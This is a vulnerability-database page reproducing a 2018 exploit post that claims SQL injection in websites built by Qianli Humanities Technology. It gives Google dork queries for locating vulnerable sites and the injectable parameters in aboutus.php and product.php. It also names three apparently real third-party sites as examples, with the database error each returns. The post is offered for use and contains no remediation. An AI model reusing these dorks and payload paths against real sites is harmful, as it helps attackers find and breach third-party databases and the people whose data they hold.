China Design by Qianli Humanities Technology 3q168.Com SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034909 漏洞类型
发布时间 2018-05-31 更新时间 2018-05-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018050312
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : China Design by Qianli Humanities Technology 3q168.Com SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 31/05/2018
# Vendor Homepage : 3q168.Com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89

#################################################################################################

# Google Dork : intext:''design by 千立人文科技''

It means in English => Qianli Humanities Technology.

# Google Dork : intext:''本網由 千立人文科技 設計建構''

It means in English => This site is designed and constructed by Qianli Humanities Technology.

# Exploit :  /aboutus.php?cid=[ID-NUMBER]&id=[SQL Injection]

# Exploit :  /product.php?cid=[ID-NUMBER]&id=[SQL Injection]

# Example Site  => 3qdemo.com/aboutus.php?cid=10&id=1%27 => archive.is/SgBlP

# Example Site  => greatquo.com/aboutus.php?cid=1&id=1%27 => archive.is/Hxgax

# Example Site => ccwr.com.tw/aboutus.php?cid=1&id=1%27 =>  archive.is/IzVbe

# SQL DB Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'N'' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################